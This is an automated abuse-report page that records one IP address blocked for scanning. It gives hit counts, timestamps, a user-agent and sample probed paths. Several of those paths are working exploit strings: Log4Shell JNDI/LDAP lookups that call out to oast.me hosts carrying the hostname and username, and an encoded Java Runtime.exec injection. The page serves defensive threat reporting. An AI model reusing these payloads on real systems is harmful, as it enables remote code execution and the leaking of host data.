abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 61
- Unique targets hit
- 1
- Unique paths probed
- 2,333
- Detection count
- 14
- First seen
- 2026-08-30 12:09:27 UTC
- Last seen
- 2026-08-30 13:12:18 UTC
- Block expires
- 2026-08-31 13:12:26 UTC
Sample paths probed
- /wp-content/plugins/everest-forms-pro/readme.txt
- /api/logstash/pipeline/$%7Bjndi:ldap://$%7B:-241%7D$%7B:-747%7D.$%7BhostName%7D.username.daa2honr4833o1s91m10xnfzfibgbzn18.oast.me/Q07G5%7D
- /adminPage/remote/cmdOver
- /webmail/basic/
- /bic/ssoService/v1/applyCT
- /two_fact_auth
- /debug.php
- /opennms/j_spring_security_check
- /v2/query
- /login
- /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20daa2honr4833o1s91m10umyfsj3xeinrh.oast.me%22%29&type=1
- /boaform/admin/formTracert
- /cgi-bin/login.cgi
- /login/SAML?=${jndi:ldap://${:-361}${:-566}.${hostName}.username.daa2honr4833o1s91m10h6g6kqyw3c36j.oast.me/Fc7vC}
- /sys/ui/extend/varkind/custom.jsp
- /sysShell
- /http-bind?room=${jndi:ldap://${:-221}${:-874}.${hostName}.username.daa2honr4833o1s91m10abaenytxp8cz3.oast.me/gBclz}
- /Login
- /prweb/
- /j_security_check
Sample User-Agents
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko, Yokohama Institute of Information Security https://www.iisec.ac.jp) Chrome/124.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.